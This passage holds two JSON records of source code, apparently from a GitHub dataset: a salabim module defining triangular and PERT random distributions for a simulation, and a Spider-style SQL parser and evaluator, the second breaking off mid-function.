+{"seq_id": "74721909207", "text": "\"\"\"Random distributions for the simulation model.\n\nThis module overrides the :py:class:`~salabim.Constant` and\n:py:class:`~salabim.Triangular` classes in :py:mod:`salabim`\nto provide better string representations, and adds a PERT distribution.\n\nSee: https://en.wikipedia.org/wiki/PERT_distribution\n\"\"\"\n\nfrom typing import Union\n\nimport salabim as sim\n\n\nclass Constant(sim.Constant):\n \"\"\"Constant distribution.\n\n Attributes:\n _value (float)\n \"\"\"\n\n def __repr__(self) -> str:\n return f'Constant({self._value}, time_unit={self.time_unit})'\n\n\nclass Tri(sim.Triangular):\n \"\"\"Triangular distribution.\n\n Attributes\n ----------\n _low: float\n Minimum of the distribution\n _mode: float | None\n Mode of the distribution. If None, replaced with the mean of `_low` and `_high`.\n _high: float | None\n Maximum of the distribution. If None, replaced with `_min`, thus forming a constant\n distribution.\n \"\"\"\n\n def __init__(\n self,\n low: float,\n mode: float | None = None,\n high: float | None = None,\n time_unit: str | None = None,\n randomstream=None,\n env: sim.Environment | None = None\n ) -> None:\n # Reorder low,high,mode parameters\n super().__init__(low, high, mode, time_unit, randomstream, env)\n\n def __repr__(self) -> str:\n return f\"Triangular(low={self._low}, mode={self._mode}, high={self._high}, \"\\\n f\"time_unit={self.time_unit})\"\n\n\nclass PERT(sim.Triangular):\n \"\"\"PERT distribution.\n\n A three-point distribution with more probability mass around the mode than the\n triangular distribution. The mean of the distribution is\n ``(_low + _shape * _mode + _high) / (_shape + 2)``.\n By default, ``_shape = 4``.\n\n Attributes\n ----------\n _low: float\n Minimum of the distribution\n _mode: float | None\n Mode of the distribution. If None, replaced with the mean of `_low` and `_high`.\n _high: float | None\n Maximum of the distribution. 
If None, replaced with `_min`, thus forming a constant\n distribution.\n \"\"\"\n\n def __init__(\n self,\n low: float,\n mode: float | None = None,\n high: float | None = None,\n time_unit: str | None = None,\n randomstream=None,\n env: sim.Environment | None = None,\n ) -> None:\n super().__init__(low, high, mode, time_unit, randomstream, env)\n self._shape = 4\n\n self._range = high - low\n self._alpha = 1 + self._shape * (mode - low) / self._range\n self._beta = 1 + self._shape * (high - mode) / self._range\n\n self._mean = (low + self._shape * mode + high) / (self._shape + 2)\n\n def __repr__(self) -> str:\n return f\"PERT(low={self._low}, mode={self._mode}, high={self._high}, \"\\\n f\"shape={self._shape}, time_unit={self.time_unit})\"\n\n def print_info(self, as_str: bool = False, file: sim.TextIO | None = None) -> str:\n \"\"\" Print info about the distribution.\n\n :meta private:\n \"\"\"\n result = []\n result.append(\"PERT \" + hex(id(self)))\n result.append(\" low=\" + str(self._low) + \" \" + self.time_unit)\n result.append(\" high=\" + str(self._high) + \" \" + self.time_unit)\n result.append(\" mode=\" + str(self._mode) + \" \" + self.time_unit)\n result.append(\" shape=\" + str(self._shape))\n result.append(\" randomstream=\" + hex(id(self.randomstream)))\n return sim.return_or_print(result, as_str, file)\n\n def sample(self) -> float:\n \"\"\":meta private:\"\"\"\n beta = self.randomstream.betavariate\n val = self._low + beta(self._alpha, self._beta) * self._range\n return val * self.time_unit_factor\n\n def mean(self) -> float:\n \"\"\":meta private:\"\"\"\n return self._mean * self.time_unit_factor\n\n\nDistribution = Union[Constant, Tri, PERT]\n\n\nclass IntPERT:\n \"\"\"Discretized PERT distribution.\"\"\"\n\n def __init__(self, low: int, mode: int, high: int, env: sim.Environment):\n self.low = low\n \"\"\"Minimum of the distribution.\"\"\"\n\n self.mode = mode\n \"\"\"Mode of the distribution.\"\"\"\n\n self.high = high\n \"\"\"Maximum of the distribution.\"\"\"\n\n self.pert = PERT(low-mode-0.5, 0, high-mode+0.5, env=env)\n \"\"\"Underlying continuous PERT distribution, i.e.\n ``PERT(low-mode-0.5, 0, high-mode+0.5)``.\"\"\"\n\n def sample(self) -> int:\n \"\"\"Sample the distribution.\"\"\"\n return self()\n\n def __call__(self) -> int:\n # Round towards 0 and add the mode\n return int(self.pert.sample()) + self.mode\n\n def __repr__(self) -> str:\n return f'IntPERT({self.low}, {self.mode}, {self.high})'\n", "repo_name": "yinchi/cuh-dashboards", "sub_path": "hpath/distributions.py", "file_name": "distributions.py", "file_ext": "py", "file_size_in_byte": 4755, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "salabim.Constant", "line_number": 15, "usage_type": "attribute"}, {"api_name": "salabim.Triangular", "line_number": 26, "usage_type": "attribute"}, {"api_name": "salabim.Environment", "line_number": 47, "usage_type": "attribute"}, {"api_name": "salabim.Triangular", "line_number": 57, "usage_type": "attribute"}, {"api_name": "salabim.Environment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "salabim.TextIO", "line_number": 98, "usage_type": "attribute"}, {"api_name": "salabim.return_or_print", "line_number": 110, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 123, "usage_type": "name"}, {"api_name": "salabim.Environment", "line_number": 129, "usage_type": "attribute"}]}
+{"seq_id": "70968750167", "text": "################################\n# Assumptions:\n# 1. sql is correct\n# 2. only table name has alias\n# 3. only one intersect/union/except\n#\n# val: number(float)/string(str)/sql(dict)\n# col_unit: (agg_id, col_id, isDistinct(bool))\n# val_unit: (unit_op, col_unit1, col_unit2)\n# table_unit: (table_type, col_unit/sql)\n# cond_unit: (not_op, op_id, val_unit, val1, val2)\n# condition: [cond_unit1, 'and'/'or', cond_unit2, ...]\n# sql {\n# 'select': (isDistinct(bool), [(agg_id, val_unit), (agg_id, val_unit), ...])\n# 'from': {'table_units': [table_unit1, table_unit2, ...], 'conds': condition}\n# 'where': condition\n# 'groupBy': [col_unit1, col_unit2, ...]\n# 'orderBy': ('asc'/'desc', [val_unit1, val_unit2, ...])\n# 'having': condition\n# 'limit': None/limit value\n# 'intersect': None/sql\n# 'except': None/sql\n# 'union': None/sql\n# }\n################################\n\nfrom __future__ import print_function\nimport os, sys\nimport json\nimport sqlite3\nimport traceback\nimport argparse\n\nimport json\nimport sqlite3\nfrom nltk import word_tokenize\n\nCLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order', 'limit', 'intersect', 'union', 'except')\nJOIN_KEYWORDS = ('join', 'on', 'as')\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", '/')\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nCOND_OPS = ('and', 'or')\nSQL_OPS = ('intersect', 'union', 'except')\nORDER_OPS = ('desc', 'asc')\n\n# from process_sql import tokenize, get_schema, get_tables_with_alias, Schema, get_sql\n\n# Flag to disable value evaluation\nDISABLE_VALUE = True\n# Flag to disable distinct in select evaluation\nDISABLE_DISTINCT = True\n\n\nCLAUSE_KEYWORDS = ('select', 'from', 'where', 'group', 'order', 'limit', 'intersect', 'union', 'except')\nJOIN_KEYWORDS = ('join', 'on', 'as')\n\nWHERE_OPS = ('not', 'between', '=', '>', '<', '>=', '<=', '!=', 'in', 'like', 'is', 'exists')\nUNIT_OPS = ('none', '-', '+', \"*\", '/')\nAGG_OPS = ('none', 'max', 'min', 'count', 'sum', 'avg')\nTABLE_TYPE = {\n 'sql': \"sql\",\n 'table_unit': \"table_unit\",\n}\n\nCOND_OPS = ('and', 'or')\nSQL_OPS = ('intersect', 'union', 'except')\nORDER_OPS = ('desc', 'asc')\n\n\nHARDNESS = {\n \"component1\": ('where', 'group', 'order', 'limit', 'join', 'or', 'like'),\n \"component2\": ('except', 'union', 'intersect')\n}\n\nclass Schema:\n \"\"\"\n Simple schema which maps table&column to a unique identifier\n \"\"\"\n def __init__(self, schema):\n self._schema = schema\n self._idMap = self._map(self._schema)\n\n @property\n def schema(self):\n return self._schema\n\n @property\n def idMap(self):\n return self._idMap\n\n def _map(self, schema):\n idMap = {'*': \"__all__\"}\n id = 1\n for key, vals in schema.items():\n for val in vals:\n idMap[key.lower() + \".\" + val.lower()] = \"__\" + key.lower() + \".\" + val.lower() + \"__\"\n id += 1\n\n for key in schema:\n idMap[key.lower()] = \"__\" + key.lower() + \"__\"\n id += 1\n\n return idMap\n\n\ndef get_schema(db):\n \"\"\"\n Get database's schema, which is a dict with table name as key\n and list of column names as value\n :param db: database path\n :return: schema dict\n \"\"\"\n\n schema = {}\n conn = sqlite3.connect(db)\n cursor = conn.cursor()\n\n # fetch table names\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = [str(table[0].lower()) for table in 
cursor.fetchall()]\n\n # fetch table info\n for table in tables:\n cursor.execute(\"PRAGMA table_info({})\".format(table))\n schema[table] = [str(col[1].lower()) for col in cursor.fetchall()]\n\n return schema\n\n\ndef get_schema_from_json(fpath):\n with open(fpath) as f:\n data = json.load(f)\n\n schema = {}\n for entry in data:\n table = str(entry['table'].lower())\n cols = [str(col['column_name'].lower()) for col in entry['col_data']]\n schema[table] = cols\n\n return schema\n\n\ndef tokenize(string):\n string = str(string)\n string = string.replace(\"\\'\", \"\\\"\") # ensures all string values wrapped by \"\" problem??\n quote_idxs = [idx for idx, char in enumerate(string) if char == '\"']\n assert len(quote_idxs) % 2 == 0, \"Unexpected quote\"\n\n # keep string value as token\n vals = {}\n for i in range(len(quote_idxs)-1, -1, -2):\n qidx1 = quote_idxs[i-1]\n qidx2 = quote_idxs[i]\n val = string[qidx1: qidx2+1]\n key = \"__val_{}_{}__\".format(qidx1, qidx2)\n string = string[:qidx1] + key + string[qidx2+1:]\n vals[key] = val\n\n toks = [word.lower() for word in word_tokenize(string)]\n # replace with string value token\n for i in range(len(toks)):\n if toks[i] in vals:\n toks[i] = vals[toks[i]]\n\n # find if there exists !=, >=, <=\n eq_idxs = [idx for idx, tok in enumerate(toks) if tok == \"=\"]\n eq_idxs.reverse()\n prefix = ('!', '>', '<')\n for eq_idx in eq_idxs:\n pre_tok = toks[eq_idx-1]\n if pre_tok in prefix:\n toks = toks[:eq_idx-1] + [pre_tok + \"=\"] + toks[eq_idx+1: ]\n\n return toks\n\n\ndef scan_alias(toks):\n \"\"\"Scan the index of 'as' and build the map for all alias\"\"\"\n as_idxs = [idx for idx, tok in enumerate(toks) if tok == 'as']\n alias = {}\n for idx in as_idxs:\n alias[toks[idx+1]] = toks[idx-1]\n return alias\n\n\ndef get_tables_with_alias(schema, toks):\n tables = scan_alias(toks)\n for key in schema:\n assert key not in tables, \"Alias {} has the same name in table\".format(key)\n tables[key] = key\n return tables\n\n\ndef parse_col(toks, start_idx, tables_with_alias, schema, default_tables=None):\n \"\"\"\n :returns next idx, column id\n \"\"\"\n tok = toks[start_idx]\n if tok == \"*\":\n return start_idx + 1, schema.idMap[tok]\n\n if '.' 
in tok: # if token is a composite\n alias, col = tok.split('.')\n key = tables_with_alias[alias] + \".\" + col\n return start_idx+1, schema.idMap[key]\n\n assert default_tables is not None and len(default_tables) > 0, \"Default tables should not be None or empty\"\n\n for alias in default_tables:\n table = tables_with_alias[alias]\n if tok in schema.schema[table]:\n key = table + \".\" + tok\n return start_idx+1, schema.idMap[key]\n\n assert False, \"Error col: {}\".format(tok)\n\n\ndef parse_col_unit(toks, start_idx, tables_with_alias, schema, default_tables=None):\n \"\"\"\n :returns next idx, (agg_op id, col_id)\n \"\"\"\n idx = start_idx\n len_ = len(toks)\n isBlock = False\n isDistinct = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] in AGG_OPS:\n agg_id = AGG_OPS.index(toks[idx])\n idx += 1\n assert idx < len_ and toks[idx] == '('\n idx += 1\n if toks[idx] == \"distinct\":\n idx += 1\n isDistinct = True\n idx, col_id = parse_col(toks, idx, tables_with_alias, schema, default_tables)\n assert idx < len_ and toks[idx] == ')'\n idx += 1\n return idx, (agg_id, col_id, isDistinct)\n\n if toks[idx] == \"distinct\":\n idx += 1\n isDistinct = True\n agg_id = AGG_OPS.index(\"none\")\n idx, col_id = parse_col(toks, idx, tables_with_alias, schema, default_tables)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n\n return idx, (agg_id, col_id, isDistinct)\n\n\ndef parse_val_unit(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n col_unit1 = None\n col_unit2 = None\n unit_op = UNIT_OPS.index('none')\n\n idx, col_unit1 = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n if idx < len_ and toks[idx] in UNIT_OPS:\n unit_op = UNIT_OPS.index(toks[idx])\n idx += 1\n idx, col_unit2 = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n\n return idx, (unit_op, col_unit1, col_unit2)\n\n\ndef parse_table_unit(toks, start_idx, tables_with_alias, schema):\n \"\"\"\n :returns next idx, table id, table name\n \"\"\"\n idx = start_idx\n len_ = len(toks)\n key = tables_with_alias[toks[idx]]\n\n if idx + 1 < len_ and toks[idx+1] == \"as\":\n idx += 3\n else:\n idx += 1\n\n return idx, schema.idMap[key], key\n\n\ndef parse_value(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] == 'select':\n idx, val = parse_sql(toks, idx, tables_with_alias, schema)\n elif \"\\\"\" in toks[idx]: # token is a string value\n val = toks[idx]\n idx += 1\n else:\n try:\n val = float(toks[idx])\n idx += 1\n except:\n end_idx = idx\n while end_idx < len_ and toks[end_idx] != ',' and toks[end_idx] != ')'\\\n and toks[end_idx] != 'and' and toks[end_idx] not in CLAUSE_KEYWORDS and toks[end_idx] not in JOIN_KEYWORDS:\n end_idx += 1\n\n idx, val = parse_col_unit(toks[start_idx: end_idx], 0, tables_with_alias, schema, default_tables)\n idx = end_idx\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1\n\n return idx, val\n\n\ndef parse_condition(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n conds = []\n\n while idx < len_:\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n not_op = False\n if toks[idx] == 'not':\n not_op = True\n idx += 1\n\n 
assert idx < len_ and toks[idx] in WHERE_OPS, \"Error condition: idx: {}, tok: {}\".format(idx, toks[idx])\n op_id = WHERE_OPS.index(toks[idx])\n idx += 1\n val1 = val2 = None\n if op_id == WHERE_OPS.index('between'): # between..and... special case: dual values\n idx, val1 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n assert toks[idx] == 'and'\n idx += 1\n idx, val2 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n else: # normal case: single value\n idx, val1 = parse_value(toks, idx, tables_with_alias, schema, default_tables)\n val2 = None\n\n conds.append((not_op, op_id, val_unit, val1, val2))\n\n if idx < len_ and (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\") or toks[idx] in JOIN_KEYWORDS):\n break\n\n if idx < len_ and toks[idx] in COND_OPS:\n conds.append(toks[idx])\n idx += 1 # skip and/or\n\n return idx, conds\n\n\ndef parse_select(toks, start_idx, tables_with_alias, schema, default_tables=None):\n idx = start_idx\n len_ = len(toks)\n\n assert toks[idx] == 'select', \"'select' not found\"\n idx += 1\n isDistinct = False\n if idx < len_ and toks[idx] == 'distinct':\n idx += 1\n isDistinct = True\n val_units = []\n\n while idx < len_ and toks[idx] not in CLAUSE_KEYWORDS:\n agg_id = AGG_OPS.index(\"none\")\n if toks[idx] in AGG_OPS:\n agg_id = AGG_OPS.index(toks[idx])\n idx += 1\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n val_units.append((agg_id, val_unit))\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n\n return idx, (isDistinct, val_units)\n\n\ndef parse_from(toks, start_idx, tables_with_alias, schema):\n \"\"\"\n Assume in the from clause, all table units are combined with join\n \"\"\"\n assert 'from' in toks[start_idx:], \"'from' not found\"\n\n len_ = len(toks)\n idx = toks.index('from', start_idx) + 1\n default_tables = []\n table_units = []\n conds = []\n\n while idx < len_:\n isBlock = False\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n if toks[idx] == 'select':\n idx, sql = parse_sql(toks, idx, tables_with_alias, schema)\n table_units.append((TABLE_TYPE['sql'], sql))\n else:\n if idx < len_ and toks[idx] == 'join':\n idx += 1 # skip join\n idx, table_unit, table_name = parse_table_unit(toks, idx, tables_with_alias, schema)\n table_units.append((TABLE_TYPE['table_unit'],table_unit))\n default_tables.append(table_name)\n if idx < len_ and toks[idx] == \"on\":\n idx += 1 # skip on\n idx, this_conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n if len(conds) > 0:\n conds.append('and')\n conds.extend(this_conds)\n\n if isBlock:\n assert toks[idx] == ')'\n idx += 1\n if idx < len_ and (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n break\n\n return idx, table_units, conds, default_tables\n\n\ndef parse_where(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n\n if idx >= len_ or toks[idx] != 'where':\n return idx, []\n\n idx += 1\n idx, conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n return idx, conds\n\n\ndef parse_group_by(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n col_units = []\n\n if idx >= len_ or toks[idx] != 'group':\n return idx, col_units\n\n idx += 1\n assert toks[idx] == 'by'\n idx += 1\n\n while idx < len_ and not (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n idx, col_unit = parse_col_unit(toks, idx, tables_with_alias, schema, default_tables)\n 
col_units.append(col_unit)\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n else:\n break\n\n return idx, col_units\n\n\ndef parse_order_by(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n val_units = []\n order_type = 'asc' # default type is 'asc'\n\n if idx >= len_ or toks[idx] != 'order':\n return idx, val_units\n\n idx += 1\n assert toks[idx] == 'by'\n idx += 1\n\n while idx < len_ and not (toks[idx] in CLAUSE_KEYWORDS or toks[idx] in (\")\", \";\")):\n idx, val_unit = parse_val_unit(toks, idx, tables_with_alias, schema, default_tables)\n val_units.append(val_unit)\n if idx < len_ and toks[idx] in ORDER_OPS:\n order_type = toks[idx]\n idx += 1\n if idx < len_ and toks[idx] == ',':\n idx += 1 # skip ','\n else:\n break\n\n return idx, (order_type, val_units)\n\n\ndef parse_having(toks, start_idx, tables_with_alias, schema, default_tables):\n idx = start_idx\n len_ = len(toks)\n\n if idx >= len_ or toks[idx] != 'having':\n return idx, []\n\n idx += 1\n idx, conds = parse_condition(toks, idx, tables_with_alias, schema, default_tables)\n return idx, conds\n\n\ndef parse_limit(toks, start_idx):\n idx = start_idx\n len_ = len(toks)\n\n if idx < len_ and toks[idx] == 'limit':\n idx += 2\n return idx, int(toks[idx-1])\n\n return idx, None\n\n\ndef parse_sql(toks, start_idx, tables_with_alias, schema):\n isBlock = False # indicate whether this is a block of sql/sub-sql\n len_ = len(toks)\n idx = start_idx\n\n sql = {}\n if toks[idx] == '(':\n isBlock = True\n idx += 1\n\n # parse from clause in order to get default tables\n from_end_idx, table_units, conds, default_tables = parse_from(toks, start_idx, tables_with_alias, schema)\n sql['from'] = {'table_units': table_units, 'conds': conds}\n # select clause\n _, select_col_units = parse_select(toks, idx, tables_with_alias, schema, default_tables)\n idx = from_end_idx\n sql['select'] = select_col_units\n # where clause\n idx, where_conds = parse_where(toks, idx, tables_with_alias, schema, default_tables)\n sql['where'] = where_conds\n # group by clause\n idx, group_col_units = parse_group_by(toks, idx, tables_with_alias, schema, default_tables)\n sql['groupBy'] = group_col_units\n # having clause\n idx, having_conds = parse_having(toks, idx, tables_with_alias, schema, default_tables)\n sql['having'] = having_conds\n # order by clause\n idx, order_col_units = parse_order_by(toks, idx, tables_with_alias, schema, default_tables)\n sql['orderBy'] = order_col_units\n # limit clause\n idx, limit_val = parse_limit(toks, idx)\n sql['limit'] = limit_val\n\n idx = skip_semicolon(toks, idx)\n if isBlock:\n assert toks[idx] == ')'\n idx += 1 # skip ')'\n idx = skip_semicolon(toks, idx)\n\n # intersect/union/except clause\n for op in SQL_OPS: # initialize IUE\n sql[op] = None\n if idx < len_ and toks[idx] in SQL_OPS:\n sql_op = toks[idx]\n idx += 1\n idx, IUE_sql = parse_sql(toks, idx, tables_with_alias, schema)\n sql[sql_op] = IUE_sql\n return idx, sql\n\n\ndef load_data(fpath):\n with open(fpath) as f:\n data = json.load(f)\n return data\n\n\ndef get_sql(schema, query):\n toks = tokenize(query)\n tables_with_alias = get_tables_with_alias(schema.schema, toks)\n _, sql = parse_sql(toks, 0, tables_with_alias, schema)\n\n return sql\n\n\ndef skip_semicolon(toks, start_idx):\n idx = start_idx\n while idx < len(toks) and toks[idx] == \";\":\n idx += 1\n return idx\n\n\ndef condition_has_or(conds):\n return 'or' in conds[1::2]\n\n\ndef condition_has_like(conds):\n return WHERE_OPS.index('like') in 
[cond_unit[1] for cond_unit in conds[::2]]\n\n\ndef condition_has_sql(conds):\n for cond_unit in conds[::2]:\n val1, val2 = cond_unit[3], cond_unit[4]\n if val1 is not None and type(val1) is dict:\n return True\n if val2 is not None and type(val2) is dict:\n return True\n return False\n\n\ndef val_has_op(val_unit):\n return val_unit[0] != UNIT_OPS.index('none')\n\n\ndef has_agg(unit):\n return unit[0] != AGG_OPS.index('none')\n\n\ndef accuracy(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef recall(count, total):\n if count == total:\n return 1\n return 0\n\n\ndef F1(acc, rec):\n if (acc + rec) == 0:\n return 0\n return (2. * acc * rec) / (acc + rec)\n\n\ndef get_scores(count, pred_total, label_total):\n if pred_total != label_total:\n return 0,0,0\n elif count == pred_total:\n return 1,1,1\n return 0,0,0\n\n\ndef eval_sel(pred, label):\n pred_sel = pred['select'][1]\n label_sel = label['select'][1]\n label_wo_agg = [unit[1] for unit in label_sel]\n pred_total = len(pred_sel)\n label_total = len(label_sel)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_sel:\n if unit in label_sel:\n cnt += 1\n label_sel.remove(unit)\n if unit[1] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[1])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_where(pred, label):\n pred_conds = [unit for unit in pred['where'][::2]]\n label_conds = [unit for unit in label['where'][::2]]\n label_wo_agg = [unit[2] for unit in label_conds]\n pred_total = len(pred_conds)\n label_total = len(label_conds)\n cnt = 0\n cnt_wo_agg = 0\n\n for unit in pred_conds:\n if unit in label_conds:\n cnt += 1\n label_conds.remove(unit)\n if unit[2] in label_wo_agg:\n cnt_wo_agg += 1\n label_wo_agg.remove(unit[2])\n\n return label_total, pred_total, cnt, cnt_wo_agg\n\n\ndef eval_group(pred, label):\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n pred_total = len(pred_cols)\n label_total = len(label_cols)\n cnt = 0\n pred_cols = [pred.split(\".\")[1] if \".\" in pred else pred for pred in pred_cols]\n label_cols = [label.split(\".\")[1] if \".\" in label else label for label in label_cols]\n for col in pred_cols:\n if col in label_cols:\n cnt += 1\n label_cols.remove(col)\n return label_total, pred_total, cnt\n\n\ndef eval_having(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['groupBy']) > 0:\n pred_total = 1\n if len(label['groupBy']) > 0:\n label_total = 1\n\n pred_cols = [unit[1] for unit in pred['groupBy']]\n label_cols = [unit[1] for unit in label['groupBy']]\n if pred_total == label_total == 1 \\\n and pred_cols == label_cols \\\n and pred['having'] == label['having']:\n cnt = 1\n\n return label_total, pred_total, cnt\n\n\ndef eval_order(pred, label):\n pred_total = label_total = cnt = 0\n if len(pred['orderBy']) > 0:\n pred_total = 1\n if len(label['orderBy']) > 0:\n label_total = 1\n if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and \\\n ((pred['limit'] is None and label['limit'] is None) or (pred['limit'] is not None and label['limit'] is not None)):\n cnt = 1\n return label_total, pred_total, cnt\n\n\ndef eval_and_or(pred, label):\n pred_ao = pred['where'][1::2]\n label_ao = label['where'][1::2]\n pred_ao = set(pred_ao)\n label_ao = set(label_ao)\n\n if pred_ao == label_ao:\n return 1,1,1\n return len(pred_ao),len(label_ao),0\n\n\ndef get_nestedSQL(sql):\n nested = []\n for cond_unit in sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]:\n if type(cond_unit[3]) is 
dict:\n nested.append(cond_unit[3])\n if type(cond_unit[4]) is dict:\n nested.append(cond_unit[4])\n if sql['intersect'] is not None:\n nested.append(sql['intersect'])\n if sql['except'] is not None:\n nested.append(sql['except'])\n if sql['union'] is not None:\n nested.append(sql['union'])\n return nested\n\n\ndef eval_nested(pred, label):\n label_total = 0\n pred_total = 0\n cnt = 0\n if pred is not None:\n pred_total += 1\n if label is not None:\n label_total += 1\n if pred is not None and label is not None:\n cnt += Evaluator().eval_exact_match(pred, label)\n return label_total, pred_total, cnt\n\n\ndef eval_IUEN(pred, label):\n lt1, pt1, cnt1 = eval_nested(pred['intersect'], label['intersect'])\n lt2, pt2, cnt2 = eval_nested(pred['except'], label['except'])\n lt3, pt3, cnt3 = eval_nested(pred['union'], label['union'])\n label_total = lt1 + lt2 + lt3\n pred_total = pt1 + pt2 + pt3\n cnt = cnt1 + cnt2 + cnt3\n return label_total, pred_total, cnt\n\n\ndef get_keywords(sql):\n res = set()\n if len(sql['where']) > 0:\n res.add('where')\n if len(sql['groupBy']) > 0:\n res.add('group')\n if len(sql['having']) > 0:\n res.add('having')\n if len(sql['orderBy']) > 0:\n res.add(sql['orderBy'][0])\n res.add('order')\n if sql['limit'] is not None:\n res.add('limit')\n if sql['except'] is not None:\n res.add('except')\n if sql['union'] is not None:\n res.add('union')\n if sql['intersect'] is not None:\n res.add('intersect')\n\n # or keyword\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n if len([token for token in ao if token == 'or']) > 0:\n res.add('or')\n\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n # not keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[0]]) > 0:\n res.add('not')\n\n # in keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('in')]) > 0:\n res.add('in')\n\n # like keyword\n if len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')]) > 0:\n res.add('like')\n\n return res\n\n\ndef eval_keywords(pred, label):\n pred_keywords = get_keywords(pred)\n label_keywords = get_keywords(label)\n pred_total = len(pred_keywords)\n label_total = len(label_keywords)\n cnt = 0\n\n for k in pred_keywords:\n if k in label_keywords:\n cnt += 1\n return label_total, pred_total, cnt\n\n\ndef count_agg(units):\n return len([unit for unit in units if has_agg(unit)])\n\n\ndef count_component1(sql):\n count = 0\n if len(sql['where']) > 0:\n count += 1\n if len(sql['groupBy']) > 0:\n count += 1\n if len(sql['orderBy']) > 0:\n count += 1\n if sql['limit'] is not None:\n count += 1\n if len(sql['from']['table_units']) > 0: # JOIN\n count += len(sql['from']['table_units']) - 1\n\n ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]\n count += len([token for token in ao if token == 'or'])\n cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]\n count += len([cond_unit for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like')])\n\n return count\n\n\ndef count_component2(sql):\n nested = get_nestedSQL(sql)\n return len(nested)\n\n\ndef count_others(sql):\n count = 0\n # number of aggregation\n agg_count = count_agg(sql['select'][1])\n agg_count += count_agg(sql['where'][::2])\n agg_count += count_agg(sql['groupBy'])\n if len(sql['orderBy']) > 0:\n agg_count += count_agg([unit[1] for unit in sql['orderBy'][1] if unit[1]] +\n [unit[2] for unit in sql['orderBy'][1] if unit[2]])\n agg_count += 
count_agg(sql['having'])\n if agg_count > 1:\n count += 1\n\n # number of select columns\n if len(sql['select'][1]) > 1:\n count += 1\n\n # number of where conditions\n if len(sql['where']) > 1:\n count += 1\n\n # number of group by clauses\n if len(sql['groupBy']) > 1:\n count += 1\n\n return count\n\n\nclass Evaluator:\n \"\"\"A simple evaluator\"\"\"\n def __init__(self):\n self.partial_scores = None\n\n def eval_hardness(self, sql):\n count_comp1_ = count_component1(sql)\n count_comp2_ = count_component2(sql)\n count_others_ = count_others(sql)\n\n if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:\n return \"easy\"\n elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \\\n (count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):\n return \"medium\"\n elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \\\n (2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \\\n (count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):\n return \"hard\"\n else:\n return \"extra\"\n\n def eval_exact_match(self, pred, label):\n partial_scores = self.eval_partial_match(pred, label)\n self.partial_scores = partial_scores\n\n for _, score in partial_scores.items():\n if score['f1'] != 1:\n return 0\n if len(label['from']['table_units']) > 0:\n label_tables = sorted(label['from']['table_units'])\n pred_tables = sorted(pred['from']['table_units'])\n return label_tables == pred_tables\n return 1\n\n def eval_partial_match(self, pred, label):\n res = {}\n\n label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)\n 